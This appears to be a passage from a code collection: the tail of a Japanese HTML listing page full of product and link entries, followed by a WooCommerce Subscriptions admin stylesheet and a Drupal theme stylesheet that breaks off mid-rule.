</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-lightbulb-off"></span><a href="">健康/医療/介護</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-building"></span><a href="">子供/学校/教育</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-page-white-text"></span><a href="">FREEing 1/4 ハイスクールD×D NEW リアス?グレモリー バニーVer. フィギュア(E5134)</a>
</h3>
<br/>
</div>
</div>
</section>
<section>
<div class="row-fluid">
<div class="span3">
<h3>
<span class="fam-chart-pie"></span><a href="http://factory.aedew.com/images/Chershire/02022125569cb.html">http://factory.aedew.com/images/Chershire/02022125569cb.html</a>
</h3>
<br/>
</div>
<div class="span3">
<h3>
<span class="fam-anchor"></span><a href="">ホビージャパン Asmodee アーキペラゴ ボードゲーム(C3329)
</a>
</h3>
<br/>
</div>
</div>
</section>
</div>
</article>
<!-- /Data block -->
</div>
<!-- /Grid row -->
<br/>
<!-- Grid row -->
<div class="row"><br/>
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>ホビージャパン Asmodee アーキペラゴ ボードゲーム(C3329)
</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="http://factory.aedew.com/images/Chershire/02022027810ni.html">http://factory.aedew.com/images/Chershire/02022027810ni.html</a></li>
<li><a href="">掲示板</a></li>
<li><a href="">お知らせ</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>ブログAutoPage</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="http://factory.aedew.com/images/Chershire/02022125569cb.html">http://factory.aedew.com/images/Chershire/02022125569cb.html</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021815573zw.html">http://factory.aedew.com/images/Chershire/02021815573zw.html</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>ホビージャパン Asmodee アーキペラゴ ボードゲーム(C3329)
</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="">よくある質問?ヘルプ</a></li>
<li><a href="">一覧</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
<!-- Data block -->
<article class="span3 alert-white">
<div class="data-container">
<header>
<h4>その他</h4>
</header>
<section>
<ul class="checkmark">
<li><a href="">利用規約</a></li>
<li><a href="">プライバシーステートメント</a></li>
<li><a href="">携帯にURL送信</a></li>
</ul>
</section>
</div>
</article>
<!-- /Data block -->
</div>
<!-- /Grid row -->
<!-- GMOグループフッター -->
<div id="gmofooter">
<div class="gmofooter">
<div class="gmofooter_header">
</div>
<div class="gmofooter_relatedservice">
<div class="gmofooter_heading">関連サービス</div>
<div class="gmofooter_relatedservicelist">
<ul>
<li>
<dl><dt><a target="_blank" href="http://www.freeml.com/">メーリングリスト(ML)サービス</a></dt><dd>freeml</dd></dl>
<dl><dt><a target="_blank" href="http://www.yaplog.jp/">無料ブログサービス</a></dt><dd>ヤプログ!</dd></dl>
</li>
<li>
<dl><dt><a target="_blank" href="http://coordisnap.com/">ファッションコーディネートアプリ</a></dt><dd>CoordiSnap</dd></dl>
<dl><dt><a target="_blank" href="http://prcm.jp/">女の子のためのコミュニティ</a></dt><dd>prican</dd></dl>
</li>
<li>
<dl><dt><a target="_blank" href="">こだわりランキングサイト</a></dt><dd>ランキングシェア</dd></dl>
<dl><dt><a target="_blank" href="">ネット証券</a></dt><dd>クリック証券</dd></dl>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<!-- /Right (content) side -->
</section>
<!-- /Main page container -->
<!-- Main page footer -->
<footer class="container">
<p>Copyright All Rights Reserved.</p>
<ul>
<li><a href="" class="">よくある質問(FAQ)</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021727015rh.html">http://factory.aedew.com/images/Chershire/02021727015rh.html</a></li>
<li><a href="" class="">お問い合せ</a></li>
</ul>
<a href="" class="btn btn-primary btn-flat pull-right">Top ↑</a> </footer>
<!-- /Main page footer -->
<!-- GMOグループヘッダー -->
</body>
</html>
|
wp-content/plugins/woocommerce-subscriptions/assets/css/about.css | DylanPeti/remixmagazine | /*------------------------------------------------------------------------------
Subscriptions 2.0 About Page CSS
------------------------------------------------------------------------------*/
.wcs-badge:before {
font-family: WooCommerce !important;
content: "\e03d";
color: #fff;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
font-size: 80px;
font-weight: normal;
width: 165px;
height: 165px;
line-height: 165px;
text-align: center;
position: absolute;
top: 0;
left: 0;
margin: 0;
vertical-align: middle;
}
.wcs-badge {
position: relative;;
background: #9c5d90;
text-rendering: optimizeLegibility;
padding-top: 150px;
height: 52px;
width: 165px;
font-weight: 600;
font-size: 14px;
text-align: center;
color: #ddc8d9;
margin: 5px 0 0 0;
-webkit-box-shadow: 0 1px 3px rgba(0,0,0,.2);
box-shadow: 0 1px 3px rgba(0,0,0,.2);
}
.about-wrap .feature-section {
padding-bottom: 2em;
}
.about-wrap .wcs-badge {
position: absolute;
top: 0;
right: 0;
}
.about-wrap .wcs-feature {
overflow: visible !important;
*zoom:1;
}
.about-wrap .wcs-feature:before,
.about-wrap .wcs-feature:after {
content: " ";
display: table;
}
.about-wrap .wcs-feature:after {
clear: both;
}
.about-wrap .two-col .feature-right {
float: right;
}
.about-wrap .two-col .feature-copy,
.about-wrap .two-col .feature-image {
margin-top: 2em;
}
.about-wrap div.icon {
width: 0 !important;
padding: 0;
margin: 0;
}
.woocommerce-message {
position: relative;
border-left-color: #cc99c2!important;
overflow: hidden;
}
.woocommerce-message a.button-primary,p.woocommerce-actions a.button-primary,
.woocommerce-message a.button-primary:focus, p.woocommerce-actions a.button-primary:focus,
.woocommerce-message a.button-primary:active, p.woocommerce-actions a.button-primary:active {
background: #cc99c2;
border-color: #b366a4;
-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),0 1px 0 rgba(0,0,0,.15);
box-shadow: inset 0 1px 0 rgba(255,255,255,.25),0 1px 0 rgba(0,0,0,.15);
color: #fff;
text-decoration: none;
}
.woocommerce-message a.button-primary:hover,p.woocommerce-actions a.button-primary:hover {
background: #bb77ae;
border-color: #aa559a;
-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.25),0 1px 0 rgba(0,0,0,.15);
box-shadow: inset 0 1px 0 rgba(255,255,255,.25),0 1px 0 rgba(0,0,0,.15);
}
.woocommerce-message a.button-primary:active,p.woocommerce-actions a.button-primary:active {
background: #aa559a;
border-color: #aa559a;
}
.woocommerce-message a.docs,.woocommerce-message a.skip,p.woocommerce-actions a.docs,p.woocommerce-actions a.skip {
opacity: .7;
}
.woocommerce-message .twitter-share-button,p.woocommerce-actions .twitter-share-button {
vertical-align: middle;
margin-left: 3px;
}
p.woocommerce-actions {
margin-bottom: 2em;
}
.woocommerce-about-text {
margin-bottom: 1em!important;
}
.about-wrap .feature-section.three-col .col {
width: 29.95%;
margin-right: 4.999999999%;
float: left;
}
.about-wrap .feature-section.two-col .col {
float: left;
}
.about-wrap .feature-section .col.last-feature {
margin-right: 0;
}
.about-wrap .feature-section .col.feature-right {
margin-right: 0;
float: right !important;
}
@media only screen and (max-width: 1200px) {
.about-wrap .two-col .feature-copy {
margin-top: 0;
}
}
@media only screen and (max-width: 781px) {
.about-wrap .two-col .feature-copy,
.about-wrap .feature-section {
padding-bottom: 1em;
}
.about-wrap .two-col .feature-image,
.about-wrap .changelog {
border-bottom: 0;
margin-bottom: 0;
padding-bottom: 0;
}
.about-wrap .feature-section.three-col .col {
width: 100%;
margin: 40px 0 0;
padding: 0 0 40px;
border-bottom: 1px solid rgba(0, 0, 0, 0.1);
}
}
@media only screen and (max-width: 500px) {
.about-wrap .wcs-badge:before {
width: 100%;
}
.about-wrap .wcs-badge {
position: relative;
margin-bottom: 1.5em;
width: 100%;
}
.about-wrap .three-col .col {
width: 100% !important;
float: none !important;
}
} |
sites/all/themes/nodewebs/css/style.css | ddnode/nodewebs | /* ---------- Overall Specifications ---------- */
body {
line-height: 1.5;
font-size: 87.5%;
word-wrap: break-word;
margin: 0;
padding: 0;
border: 0;
outline: 0;
}
a:link,
a:visited {
text-decoration: none;
}
a:hover,
a:active,
a:focus {
text-decoration: underline;
}
h1,
h2,
h3,
h4,
h5,
h6 {
margin: 1.0em 0 0.5em;
font-weight: inherit;
}
h1 {
font-size: 1.357em;
color: #000;
}
h2 {
font-size: 1.143em;
}
p {
margin: 0 0 1.2em;
}
del {
text-decoration: line-through;
}
tr.odd {
background-color: #dddddd;
}
img {
outline: 0;
}
code,
pre,
kbd,
samp,
var {
padding: 0 0.4em;
font-size: 0.77em;
font-family: Menlo, Consolas, "Andale Mono", "Lucida Console", "Nimbus Mono L", "DejaVu Sans Mono", monospace, "Courier New";
}
code {
background-color: #f2f2f2;
background-color: rgba(40, 40, 0, 0.06);
}
pre code,
pre kbd,
pre samp,
pre var,
kbd kbd,
kbd samp,
code var {
font-size: 100%;
background-color: transparent;
}
pre code,
pre samp,
pre var {
padding: 0;
}
.description code {
font-size: 1em;
}
kbd {
background-color: #f2f2f2;
border: 1px outset #575757;
margin: 0 3px;
color: #666;
display: inline-block;
padding: 0 6px;
-khtml-border-radius: 5px;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
border-radius: 5px;
}
pre {
background-color: #f2f2f2;
background-color: rgba(40, 40, 0, 0.06);
margin: 10px 0;
overflow: hidden;
padding: 15px;
white-space: pre-wrap;
}
/* ------------------ Fonts ------------------ */
body,
#site-slogan,
.ui-widget,
.comment-form label {
font-family: Georgia, "Times New Roman", Times, serif;
}
#header,
#footer-wrapper,
#skip-link,
ul.contextual-links,
ul.links,
ul.primary,
.item-list .pager,
div.field-type-taxonomy-term-reference,
div.messages,
div.meta,
p.comment-time,
table,
.breadcrumb {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
input,
textarea,
select,
a.button {
font-family: "Lucida Grande", "Lucida Sans Unicode", Verdana, sans-serif;
}
/* ------------------ Reset Styles ------------------ */
caption {
text-align: left; /* LTR */
font-weight: normal;
}
blockquote {
background: #f7f7f7;
border-left: 1px solid #bbb;
font-style: italic;
margin: 1.5em 10px;
padding: 0.5em 10px;
}
blockquote:before {
color: #bbb;
content: "\201C";
font-size: 3em;
line-height: 0.1em;
margin-right: 0.2em;
vertical-align: -.4em;
}
blockquote:after {
color: #bbb;
content: "\201D";
font-size: 3em;
line-height: 0.1em;
vertical-align: -.45em;
}
blockquote > p:first-child {
display: inline;
}
a.feed-icon {
display: inline-block;
padding: 15px 0 0 0;
}
/* ------------------ Table Styles ------------------ */
table {
border: 0;
border-spacing: 0;
font-size: 0.857em;
margin: 10px 0;
width: 100%;
}
table table {
font-size: 1em;
}
#footer-wrapper table {
font-size: 1em;
}
table tr th {
background: #757575;
background: rgba(0, 0, 0, 0.51);
border-bottom-style: none;
}
table tr th,
table tr th a,
table tr th a:hover {
color: #FFF;
font-weight: bold;
}
table tbody tr th {
vertical-align: top;
}
tr td,
tr th {
padding: 4px 9px;
border: 1px solid #fff;
text-align: left; /* LTR */
}
#footer-wrapper tr td,
#footer-wrapper tr th {
border-color: #555;
border-color: rgba(255, 255, 255, 0.18);
}
tr.odd {
background: #e4e4e4;
background: rgba(0, 0, 0, 0.105);
}
tr,
tr.even {
background: #efefef;
background: rgba(0, 0, 0, 0.063);
}
table ul.links {
margin: 0;
padding: 0;
font-size: 1em;
}
table ul.links li {
padding: 0 1em 0 0;
}
/* ------------------ List Styles ------------------ */
.block ol,
.block ul {
margin: 0;
padding: 0 0 0.25em 1em; /* LTR */
}
.contextual-links-wrapper {
font-size: small !important;
}
ul.contextual-links {
font-size: 0.923em;
}
.contextual-links-wrapper a {
text-shadow: 0 0 0 !important;
}
.item-list .pager {
font-size: 0.929em;
}
ul.menu li {
margin: 0;
}
.region-content ul,
.region-content ol {
margin: 1em 0;
padding: 0 0 0.25em 2.5em; /* LTR */
}
.item-list ul li {
margin: 0;
padding: 0.2em 0.5em 0 0; /* LTR */
}
ul.tips {
padding: 0 0 0 1.25em; /* LTR */
}
/* ------------------ Header ------------------ */
#skip-link {
left: 50%;
margin-left: -5.25em;
margin-top: 0;
position: absolute;
width: auto;
z-index: 50;
}
#skip-link a,
#skip-link a:link,
#skip-link a:visited {
background: #444;
background: rgba(0, 0, 0, 0.6);
color: #fff;
display: block;
font-size: 0.94em;
line-height: 1.7;
padding: 1px 10px 2px 10px;
text-decoration: none;
-khtml-border-radius: 0 0 10px 10px;
-moz-border-radius: 0 0 10px 10px;
-webkit-border-top-left-radius: 0;
-webkit-border-top-right-radius: 0;
-webkit-border-bottom-left-radius: 10px;
-webkit-border-bottom-right-radius: 10px;
border-radius: 0 0 10px 10px;
}
#skip-link a:hover,
#skip-link a:active,
#skip-link a:focus {
outline: 0;
}
#logo {
float: left; /* LTR */
padding: 15px 15px 15px 10px; /* LTR */
}
#name-and-slogan {
float: left; /* LTR */
padding-top: 25px;
margin: 0 0 30px; /* LTR */
}
#site-name {
font-size: 1.821em;
color: #686868;
line-height: 1;
}
h1#site-name {
margin: 0;
}
#site-name a {
font-weight: normal;
}
#site-slogan {
font-size: 0.929em;
margin-top: 7px;
word-spacing: 0.1em;
font-style: italic;
}
/* Region header blocks. */
.region-header .block {
font-size: 0.857em;
float: left; /* LTR */
margin: 0 10px;
padding: 0;
}
.region-header .block .content {
margin: 0;
padding: 0;
}
.region-header .block ul {
margin: 0;
padding: 0;
}
.region-header .block li {
list-style: none;
list-style-image: none;
padding: 0;
}
.region-header .form-text {
background: #fefefe;
background: rgba(255, 255, 255, 0.7);
border-color: #ccc;
border-color: rgba(255, 255, 255, 0.3);
margin-right: 2px; /* LTR */
width: 120px;
}
.region-header .form-text:hover,
.region-header .form-text:focus,
.region-header .form-text:active {
background: #fff;
background: rgba(255, 255, 255, 0.8);
}
.region-header .form-required {
color: #eee;
color: rgba(255, 255, 255, 0.7);
}
/* Region header block menus. */
.region-header .block-menu {
border: 1px solid;
border-color: #eee;
border-color: rgba(255, 255, 255, 0.2);
padding: 0;
width: 208px;
}
.region-header .block-menu li a {
display: block;
border-bottom: 1px solid;
border-bottom-color: #eee;
border-bottom-color: rgba(255, 255, 255, 0.2);
padding: 3px 7px;
}
.region-header .block-menu li a:hover,
.region-header .block-menu li a:focus,
.region-header .block-menu li a:active {
text-decoration: none;
background: rgba(255, 255, 255, 0.15);
}
.region-header .block-menu li.last a {
border-bottom: 0;
}
/* User Login block in the header region */
.region-header #block-user-login {
width: auto;
}
.region-header #block-user-login .content {
margin-top: 2px;
}
.region-header #block-user-login .form-item {
float: left; /* LTR */
margin: 0;
padding: 0;
}
.region-header #block-user-login div.item-list,
.region-header #block-user-login div.description {
font-size: 0.916em;
margin: 0;
}
.region-header #block-user-login div.item-list {
clear: both;
}
.region-header #block-user-login div.description {
display: inline;
}
.region-header #block-user-login .item-list ul {
padding: 0;
line-height: 1;
}
.region-header #block-user-login .item-list li {
list-style: none;
float: left; /* LTR */
padding: 3px 0 1px;
}
.region-header #block-user-login .item-list li.last {
padding-left: 0.5em; /* LTR */
}
.region-header #block-user-login ul.openid-links li.last {
padding-left: 0; /* LTR */
}
.region-header #user-login-form li.openid-link a,
.region-header #user-login li.openid-link a {
padding-left: 20px; /* LTR */
}
.region-header #block-user-login .form-actions {
margin: 4px 0 0;
padding: 0;
clear: both;
}
.region-header #block-user-login input.form-submit {
border: 1px solid;
border-color: #ccc;
border-color: rgba(255, 255, 255, 0.5);
background: #eee;
background: rgba(255, 255, 255, 0.7);
margin: 4px 0;
padding: 3px 8px;
}
.region-header #block-user-login input.form-submit:hover,
.region-header #block-user-login input.form-submit:focus {
background: #fff;
background: rgba(255, 255, 255, 0.9);
}
/* Search block in region header. */
.region-header #block-search-form {
width: 208px;
}
.region-header #block-search-form .form-text {
width: 154px;
}
/* Language switcher block in region header. */
.region-header .block-locale ul li {
display: inline;
padding: 0 0.5em;
}
/* --------------- Main Menu ------------ */
#main-menu {
clear: both;
}
#main-menu-links {
font-size: 0.929em;
margin: 0;
padding: 0 15px;
}
#main-menu-links li {
float: left; /* LTR */
list-style: none;
padding: 0 1px;
margin: 0 1px;
}
#main-menu-links a {
color: #333;
background: #ccc;
background: rgba(255, 255, 255, 0.7);
float: left; /* LTR */
height: 2.4em;
line-height: 2.4em;
padding: 0 0.8em;
text-decoration: none;
text-shadow: 0 1px #eee;
-khtml-border-radius-topleft: 8px;
-khtml-border-radius-topright: 8px;
-moz-border-radius-topleft: 8px;
-moz-border-radius-topright: 8px;
-webkit-border-top-left-radius: 8px;
-webkit-border-top-right-radius: 8px;
border-top-left-radius: 8px;
border-top-right-radius: 8px;
}
#main-menu-links a:hover,
#main-menu-links a:focus {
background: #f6f6f2;
background: rgba(255, 255, 255, 0.95);
}
#main-menu-links a:active {
background: #b3b3b3;
background: rgba(255, 255, 255, 1);
}
#main-menu-links li a.active {
border-bottom: none;
}
.featured #main-menu-links li a:active,
.featured #main-menu-links li a.active {
background: #f0f0f0;
background: rgba(240, 240, 240, 1.0);
}
/* --------------- Secondary Menu ------------ */
#secondary-menu-links {
float: right; /* LTR */
font-size: 0.929em;
margin: 10px 10px 0;
}
#secondary-menu-links a:hover,
#secondary-menu-links a:focus {
text-decoration: underline;
}
/* ------------------- Main ------------------- */
#main {
margin-top: 20px;
margin-bottom: 40px;
}
/* ----------------- Featured ----------------- */
#featured {
text-align: center;
font-size: 1.643em;
font-weight: normal;
line-height: 1.4;
padding: 20px 0 45px;
margin: 0;
background: #f0f0f0;
background: rgba(30, 50, 10, 0.08);
border-bottom: 1px solid #e7e7e7;
text-shadow: 1px 1px #fff;
}
#featured h2 {
font-size: 1.174em;
line-height: 1;
}
#featured p {
margin: 0;
padding: 0;
}
/* --------------- Highlighted ---------------- */
#highlighted {
border-bottom: 1px solid #d3d7d9;
font-size: 120%;
}
/* ------------------- Help ------------------- */
.region-help {
border: 1px solid #d3d7d9;
padding: 0 1.5em;
margin-bottom: 30px;
}
/* ----------------- Content ------------------ */
.content {
margin-top: 10px;
}
h1#page-title {
font-size: 2em;
line-height: 1;
}
#content h2 {
margin-bottom: 2px;
font-size: 1.429em;
line-height: 1.4;
}
.node .content {
font-size: 1.071em;
}
.node-teaser .content {
font-size: 1em;
}
.node-teaser h2 {
margin-top: 0;
padding-top: 0.5em;
}
.node-teaser h2 a {
color: #181818;
}
.node-teaser {
border-bottom: 1px solid #d3d7d9;
margin-bottom: 30px;
padding-bottom: 15px;
}
.node-sticky {
background: #f9f9f9;
background: rgba(0, 0, 0, 0.024);
border: 1px solid #d3d7d9;
padding: 0 15px 15px;
}
.node-full {
background: none;
border: none;
padding: 0;
}
.node-teaser .content {
clear: none;
line-height: 1.6;
}
.meta {
font-size: 0.857em;
color: #68696b;
margin-bottom: -5px;
}
.submitted .user-picture img {
float: left; /* LTR */
height: 20px;
margin: 1px 5px 0 0; /* LTR */
}
.field-type-taxonomy-term-reference {
margin: 0 0 1.2em;
}
.field-type-taxonomy-term-reference .field-label {
font-weight: normal;
margin: 0;
padding-right: 5px; /* LTR */
}
.field-type-taxonomy-term-reference .field-label,
.field-type-taxonomy-term-reference ul.links {
font-size: 0.8em;
}
.node-teaser .field-type-taxonomy-term-reference .field-label,
.node-teaser .field-type-taxonomy-term-reference ul.links {
font-size: 0.821em;
}
.field-type-taxonomy-term-reference ul.links {
padding: 0;
margin: 0;
list-style: none;
}
.field-type-taxonomy-term-reference ul.links li {
float: left; /* LTR */
padding: 0 1em 0 0; /* LTR */
white-space: nowrap;
}
.link-wrapper {
text-align: right;
}
.field-type-image img,
.user-picture img {
margin: 0 0 1em;
}
ul.links {
color: #68696b;
font-size: 0.821em;
}
.node-unpublished {
margin: -20px -15px 0;
padding: 20px 15px 0;
}
.node-unpublished .comment-text .comment-arrow {
border-left: 1px solid #fff4f4;
border-right: 1px solid #fff4f4;
}
/* ----------------- Comments ----------------- */
.comment h2.title {
margin-bottom: 1em;
}
.comment div.user-picture img {
margin-left: 0; /* LTR */
}
.comment {
margin-bottom: 20px;
display: table;
vertical-align: top;
}
.comment .attribution {
display: table-cell;
padding: 0 30px 0 0; /* LTR */
vertical-align: top;
overflow: hidden;
}
.comment .attribution img {
margin: 0;
border: 1px solid #d3d7d9;
}
.comment .attribution .username {
white-space: nowrap;
}
.comment .submitted p {
margin: 4px 0;
font-size: 1.071em;
line-height: 1.2;
}
.comment .submitted .comment-time {
font-size: 0.786em;
color: #68696b;
}
.comment .submitted .comment-permalink {
font-size: 0.786em;
text-transform: lowercase;
}
.comment .content {
font-size: 0.929em;
line-height: 1.6;
}
.comment .comment-arrow {
background: url(../images/comment-arrow.gif) no-repeat 0 center transparent; /* LTR */
border-left: 1px solid;
border-right: 1px solid;
height: 40px;
margin-left: -47px; /* LTR */
margin-top: 10px;
position: absolute;
width: 20px;
}
.comment .comment-text {
padding: 10px 25px;
border: 1px solid #d3d7d9;
display: table-cell;
vertical-align: top;
position: relative;
width: 100%;
}
.comment .indented {
margin-left: 40px; /* LTR */
}
.comment ul.links {
padding: 0 0 0.25em 0;
}
.comment ul.links li {
padding: 0 0.5em 0 0; /* LTR */
}
.comment-unpublished {
margin-right: 5px; /* LTR */
padding: 5px 2px 5px 5px; /* LTR */
}
.comment-unpublished .comment-text .comment-arrow {
border-left: 1px solid #fff4f4;
border-right: 1px solid #fff4f4;
}
/* ------------------ Sidebar ----------------- */
.sidebar .section {
padding-top: 10px;
}
.sidebar .block {
border: 1px solid;
padding: 15px 20px;
margin: 0 0 20px;
}
.sidebar h2 {
margin: 0 0 0.5em;
border-bottom: 1px solid #d6d6d6;
padding-bottom: 5px;
text-shadow: 0 1px 0 #fff;
font-size: 1.071em;
line-height: 1.2;
}
.sidebar .block .content {
font-size: 0.914em;
line-height: 1.4;
}
.sidebar tbody {
border: none;
}
.sidebar tr.even,
.sidebar tr.odd {
background: none;
border-bottom: 1px solid #d6d6d6;
}
/* ----------------- Triptych ----------------- */
#triptych-wrapper {
background-color: #f0f0f0;
background: rgba(30, 50, 10, 0.08);
border-top: 1px solid #e7e7e7;
}
#triptych h2 {
color: #000;
font-size: 1.714em;
margin-bottom: 0.8em;
text-shadow: 0 1px 0 #fff;
text-align: center;
line-height: 1;
}
#triptych .block {
margin-bottom: 2em;
padding-bottom: 2em;
border-bottom: 1px solid #dfdfdf;
line-height: 1.3;
}
#triptych .block.last {
border-bottom: none;
}
#triptych .block ul li,
#triptych .block ol li {
list-style: none;
}
#triptych .block ul,
#triptych .block ol {
padding-left: 0;
}
#triptych #block-user-login .form-text {
width: 185px;
}
#triptych #block-user-online p {
margin-bottom: 0;
}
#triptych #block-node-syndicate h2 {
overflow: hidden;
width: 0;
height: 0;
}
#triptych-last #block-node-syndicate {
text-align: right;
}
#triptych #block-search-form .form-type-textfield input {
width: 185px;
}
#triptych-middle #block-system-powered-by {
text-align: center;
}
#triptych-last #block-system-powered-by {
text-align: right;
}
/* ------------------ Footer ------------------ */
#footer-wrapper {
color: #c0c0c0;
color: rgba(255, 255, 255, 0.65);
font-size: 0.857em;
}
#footer-wrapper a {
color: #fcfcfc;
color: rgba(255, 255, 255, 0.8);
}
#footer-wrapper a:hover,
#footer-wrapper a:focus {
color: #fefefe;
color: rgba(255, 255, 255, 0.95);
text-decoration: underline;
}
#footer-wrapper .block {
margin: 20px 0;
border: 1px solid #444;
border-color: rgba(255, 255, 255, 0.1);
padding: 10px;
}
#footer-columns .block-menu,
#footer .block {
margin: 0;
padding: 0;
border: none;
}
#footer .block {
margin: 0.5em 0;
}
#footer .block .content {
padding: 0.5em 0;
margin-top: 0;
}
#footer .block h2 {
margin: 0;
}
#footer-columns h2 {
border-bottom: 1px solid #555;
border-color: rgba(255, 255, 255, 0.15);
font-size: 1em;
margin-bottom: 0;
padding-bottom: 3px;
text-transform: uppercase;
}
#footer-columns .content {
margin-top: 0;
}
#footer-columns p {
margin-top: 1em;
}
#footer-columns .content ul {
list-style: none;
padding-left: 0; /* LTR */
margin-left: 0;
}
#footer-columns .content li {
list-style: none;
margin: 0;
padding: 0;
}
#footer-columns .content li a {
display: block;
border-bottom: 1px solid #555;
border-color: rgba(255, 255, 255, 0.15);
line-height: 1.2;
padding: 0.8em 2px 0.8em 20px; /* LTR */
text-indent: -15px;
}
#footer-columns .content li a:hover,
#footer-columns .content li a:focus {
background-color: #1f1f21;
background-color: rgba(255, 255, 255, 0.05);
text-decoration: none;
}
#footer {
letter-spacing: 0.2px;
margin-top: 30px;
border-top: 1px solid #555;
border-color: rgba(255, 255, 255, 0.15);
}
#footer .region {
margin-top: 20px;
}
#footer .block {
clear: both;
}
#footer ul,
#footer li {
list-style: none;
margin: 0;
padding: 0;
}
#footer li a {
float: left; /* LTR */
padding: 0 12px;
display: block;
border-right: 1px solid #555; /* LTR */
border-color: rgba(255, 255, 255, 0.15);
}
#footer li.first a {
padding-left: 0; /* LTR */
}
#footer li.last a {
padding-right: 0; /* LTR */
border-right: none; /* LTR */
}
#footer-wrapper tr.odd {
background-color: transparent;
}
#footer-wrapper tr.even {
background-color: #2c2c2c;
background-color: rgba(0, 0, 0, 0.15);
}
/* --------------- System Tabs --------------- */
.tabs {
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
margin-bottom: 20px;
}
.tabs ul.primary {
padding: 0 3px;
margin: 0;
overflow: hidden;
border: none;
background: transparent url(../images/tabs-border.png) repeat-x left bottom;
}
.tabs ul.primary li {
display: block;
float: left; /* LTR */
vertical-align: bottom;
margin: 0 5px 0 0; /* LTR */
}
.tabs ul.primary li.active a {
border-bottom: 1px solid #ffffff;
}
.tabs ul.primary li a {
color: #000;
background-color: #ededed;
height: 1.8em;
line-height: 1.9;
display: block;
font-size: 0.929em;
float: left; /* not LTR */
padding: 0 10px 3px;
margin: 0;
text-shadow: 0 1px 0 #fff;
-khtml-border-radius-topleft: 6px;
-moz-border-radius-topleft: 6px;
-webkit-border-top-left-radius: 6px;
border-top-left-radius: 6px;
-khtml-border-radius-topright: 6px;
-moz-border-radius-topright: 6px;
-webkit-border-top-right-radius: 6px;
border-top-right-radius: 6px;
}
.tabs ul.primary li.active a {
background-color: #ffffff;
}
.tabs ul.secondary {
border-bottom: none;
padding: 0.5em 0;
}
.tabs ul.secondary li {
display: block;
float: left; /* LTR */
}
.tabs ul.secondary li:last-child {
border-right: none; /* LTR */
}
.tabs ul.secondary li:first-child {
padding-left: 0; /* LTR */
}
.tabs ul.secondary li a {
padding: 0.25em 0.5em;
}
.tabs ul.secondary li a.active {
background: #f2f2f2;
border-bottom: none;
-moz-border-radius: 5px;
-webkit-border-radius: 5px;
-khtml-border-radius: 5px;
border-radius: 5px;
}
ul.action-links {
list-style: none;
margin: 5px;
padding: 0.5em 1em;
}
ul.action-links li {
display: inline-block;
margin-left: 10px;
}
ul.action-links li a {
padding-left: 15px;
background: url(../images/add.png) no-repeat left center;
margin: 0 10px 0 0;
}
/* ---------------- Messages ----------------- */
#messages {
padding: 20px 0 5px;
margin: 0 auto;
}
.featured #messages {
background: #f0f0f0;
background: rgba(30, 50, 10, 0.08);
}
div.messages {
margin: 8px 15px;
}
/* -------------- Breadcrumbs -------------- */
.breadcrumb {
font-size: 0.929em;
}
/* -------------- User Profile -------------- */
.profile .user-picture {
float: none;
}
/* -------------- Password Meter ------------- */
.confirm-parent,
.password-parent {
width: 34em;
}
.password-parent,
div.form-item div.password-suggestions {
position: relative;
}
.password-strength-text,
.password-strength-title,
div.password-confirm {
font-size: 0.82em;
}
.password-strength-text {
margin-top: 0.2em;
}
div.password-confirm {
margin-top: 2.2em;
width: 20.73em;
}
/* ---------------- Buttons ---------------- */
input.form-submit,
a.button {
background: #fff url(../images/buttons.png) 0 0 repeat-x;
border: 1px solid #e4e4e4;
border-bottom: 1px solid #b4b4b4;
border-left-color: #d2d2d2;
border-right-color: #d2d2d2;
color: #3a3a3a;
cursor: pointer;
font-size: 0.929em;
font-weight: normal;
text-align: center;
margin-bottom: 1em;
margin-right: 0.6em; /* LTR */
padding: 4px 17px;
-khtml-border-radius: 15px;
-moz-border-radius: 20px;
-webkit-border-radius: 15px;
border-radius: 15px;
}
a.button:link,
a.button:visited,
a.button:hover,
a.button:focus,
a.button:active {
text-decoration: none;
color: #5a5a5a;
}
/* -------------- Form Elements ------------- */
fieldset {
background: #ffffff;
border: 1px solid #cccccc;
margin-top: 10px;
margin-bottom: 32px;
padding: 0 0 10px;
position: relative;
top: 12px; /* Offsets the negative margin of legends */
-khtml-border-radius: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
.fieldset-wrapper {
margin-top: 25px;
}
.node-form .vertical-tabs .fieldset-wrapper {
margin-top: 0;
}
.filter-wrapper {
top: 0;
padding: 1em 0 0.2em;
-khtml-border-radius-topright: 0;
-khtml-border-radius-topleft: 0;
-moz-border-radius-topright: 0;
-moz-border-radius-topleft: 0;
-webkit-border-top-left-radius: 0;
-webkit-border-top-right-radius: 0;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.filter-help a {
font-size: 0.857em;
padding: 2px 20px 0;
}
.filter-wrapper .form-item label {
margin-right: 10px;
}
.filter-wrapper .form-item {
padding: 0 0 0.5em 0.5em;
}
.filter-guidelines {
padding: 0 1.5em 0 0.5em;
}
fieldset.collapsed {
background: transparent;
-khtml-border-radius: 0;
-moz-border-radius: 0;
-webkit-border-radius: 0;
border-radius: 0;
}
fieldset legend {
background: #dbdbdb;
border: 1px solid #ccc;
border-bottom: none;
color: #3b3b3b;
display: block;
height: 2em;
left: -1px; /* LTR */
font-family: "Lucida Grande", "Lucida Sans Unicode", Verdana, sans-serif;
line-height: 2;
padding: 0;
position: absolute;
text-indent: 10px;
